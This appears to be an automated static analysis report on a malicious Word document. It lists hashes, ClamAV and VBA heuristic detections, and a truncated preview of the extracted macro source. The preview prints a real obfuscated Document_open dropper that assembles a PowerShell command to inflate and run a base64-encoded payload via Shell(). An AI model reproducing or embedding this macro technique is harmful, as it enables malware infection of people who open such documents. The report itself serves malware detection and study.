Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b72da9c86e4496c5…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 257.8 KB
Created: 2018-07-10 07:40:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: 17bea7c5ba175d247da298ef4e9c79e2
SHA-1: 96ac7506c3b82e8ee8ecfece7408f3b9162cb991
SHA-256: b72da9c86e4496c51fc622ddd5d45c4e390aa8272be4ff0b7ba7590ba2f673d3
Risk score: 222

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6606216-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6606216-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA code calls Shell()
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    The VBA project defines a Document_Open macro, which runs automatically when the document is opened
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download, or object-execution tokens. This rule catches p-code-only documents and documents whose source extraction failed, where no visible macro source is available.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels indicate which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body; this is the standard OOXML DrawingML schema namespace and is expected in Office documents)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   18607 bytes
SHA-256: e26fd7831bde5b7e7f634274ef707ac6594bab73ff88c5d232bee45b688fcf30

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "DMbiYMwIYaSCuq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   CEzfiW = (CUqmLj / AGFJAv * (27130 - 45351 * 57145 * SKQhR / (WRTaH * PtRlK)))
   EhirL = (nQVVoU / abMUFA * (72278 - 21012 * 39421 * rIbsq / (sOlrC * pkSFF)))
   CdbBm = (CAuHST / LCzLC * (60722 - 90754 * 66705 * Gsocti / (WjoXq * cAfBEv)))
   drQof = (kYuYhX / XiNJiT * (58757 - 47068 * 51473 * whjZwf / (aADLc * YoOCl)))
   QpSAFR = (sWbBr / OUGvG * (73299 - 86271 * 89604 * hUPuhp / (UQtao * GPiUj)))
HzHCrSzJ ("" + wfGchoj + KlJkMrjjjwE + ZLwbPHlqJ + TrtLPM + wOLrw + YCUamDh + zErSIzlLkdWBKH)
   BOrNm = (fmtJS / UulnBV * (88225 - 42314 * 94711 * zRzIwk / (CNuEMl * qFItZF)))
   fqrpri = (pOuQG / ZQiJv * (1646 - 82775 * 91963 * pIIwz / (MAwsVz * GRGsCC)))
End Sub


Attribute VB_Name = "KvfYQpikdEh"
Function ZLwbPHlqJ()
On Error Resume Next
jaDjkO = (95981 - ftwdZz * (55404 * 4899))
   HXLXzJ = (61739 - RcAfZ * (33308 * 92102))
zbjfNsVTmUt = "p" + rUVqcWRfLpqi + PhfBrWJ + "owe" + SPhdrcXcsbLGP + aMTjmuoLcYKR + "r" + pTbdjCa + ZCoMzGKzATuai + "sh" + atiDEEhLZbD + djLJiTujwhqE + "e" + JwDaLQACmYX + srOkuwaUQIkwL + "ll" + cMnwndXMWBrsj + mmniCpjzwGrGsq + " ( " + AHHaalYDLUi + CGquTVwIjGDs + "n" + swXiWDXrkcAXB + ShLrOtAALZUU + "Ew" + ADhLvjGopH + LVOuwUkX + "-Ob" + sBAwrvLFBi + kYSLFhdisD + "J" + ifmRcAk + bKjLwoL + "E" + FGKnlpblOCtj + zzNMJtcBwCSIO + "Ct" + HsSBIzvrvuwprm + WuVjOkc + " " + HEIIVcbplGKa + rEFRRMDlPQ + " sY" + NsFlWPRRAtmjaR + GfXinWd + "st" + TLojVprK + ikzkuJRXw + "em" + rzqDfjtTHr + dDEckfDvYBD + ".i"
GucUW = fLlcLw * qFzrRW + HWhph / 62087 / 85848 * WzpwCm
   RwltjS = btdHow * jjjUJj + mnqFl / 78667 / 76638 * OvqRQj
   dkpiFw = YEvYR * Qidpb + LunzdD / 78698 / 58958 * RWiRnD
Vpblkz = "o" + EHpjRBpQWj + McoBhlpmL + ".ST" + SVHhNGdCM + kTobcmIM + "rEa" + jVEutPFR + IdrXOKTcJsilPD + "M" + NGICdzuIlz + UrYkwzAHcQMSS + "ReA" + oiuFBDX + ILUIjimOIjISUt + "deR" + Cktwuqjzw + ruBkwoZbmis + "( (" + izJmXkTkHpwSiG + bWMdEuUGw + "n" + vSAlKMzRwjz + ltkECRRi + "E"
LHfup = 69444 * CqMGYS / 12833 - oGfoI * iwzrKK * Eiuva
nCIJHTzCD = "w-" + iRJhTdGNGMb + OKmtLYj + "ObJ" + CfZNwLRKwJR + oVGpHYjt + "E" + jOqTIBOkISwP + FfuvvORM + "Ct" + WQnWRIc + wtwIsJJjZI + "  " + Zrzjbdnw + UolzrOrSA + "sYs" + shOHWCmm + DStzYnnpfonGf + "TeM" + XuRurGIR + KlcFaBMlZQWs + "." + aEdUBYlCow + UrnluAuQ + "i" + LkEnbVG + itwUndnQavHwf + "O." + hVwnWVwkF + tQNwPwjHUOVWz + "c" + jTUGGfil + XSmSjJtw + "o" + XCifLQYkELww + miPwRNOfH + "m" + itooFcaFYjjpo + HthvIZmXjBtuf + "Pr" + svonhWjvzj + GjFpbDaGUwMhS + "es" + InLiuYDqlA + TYzhMkhjq + "s" + SqEazujH + AaInBdTDpUpap + "IOn"
XQzzlK = jbtrpw / wBtfY / zptKG / cBHWr - 3195 + scdjJj - UthuJn + zsSvu + nkiWp + XiiZFB
   GaSRjv = zDHzBT / dJoazk / HuHuT / wqUct - 39311 + OYZALz - ohaXn + iFUki + FizfL + PjvIi
ivQWYYOmqDO = ".DE" + YiEjoOzMVZUj + hrVjzoPMOtOdwP + "fla" + wuRHwzBlwPG + aLbQTCEnz + "t" + RLQKVKSij + aSzzhqkmiiW + "es" + hmNcNYszMAqmj + mwYJWzkJQ + "trE" + NCMziuMbci + ULwaNSJKzAUAl + "A" + cozdwGsKp + RvaHNjpGD + "M(" + ZXqHKWNiLN + knfFAjbAJmzA + " [" + qnnLfGPDPZmo + zGcztNqUhb + "syS" + bzPmXqtajZ + iRSjXGSMnFDCKA + "tem" + uVFMXIi + dBwvVpXLcRbuJ + ".IO" + IckWuNbXjsj + icamAstEWQ + ".ME" + fqiifGkYf + YIXaBiNCpdEdzr + "m" + QDVmLSFPWtpDmv + fhCidSraJOcma + "Or" + qqMTUJQkFCID + JQtqPzSpKQwLv + "yS" + qToJKwNZcSfOzw + OjlAzjvLPQ + "TRe" + wUJOnnOjUuz + rQYkjUsjvkbJdw + "aM" + cuuzidHJQb + rAUlvEGSXajv + "] "
AkhEKo = 14564 * rADtN + 27025 * OTHKL / vQqOYs - zCNwpm - XcMRVa / ITiCrs * 16737 * GYlzE - Trqlw / MpmFE + 52222 + mmHqpl
BiQLGAa = "[C" + HLhzjqvoNshXDl + ZHTTjdzQGWW + "O" + vLsSXjiEwlVt + MtOjAmKQdrTPi + "nv" + sKUwGRjoF + qbcWwZi + "erT" + WsnVNXfiBwHE + DbBzrajFJDwvj + "]:" + ttjtcuAW + ilznGYzZnYuz + ":f" + JFRjkWRnrbHEa + tDECOIpiRCiBW + "roM" + MwRpjWcRm + vtVfBzmku + "bA" + uNiUXzjFVvrdP + laSQmSbzNvNl + "
... (truncated)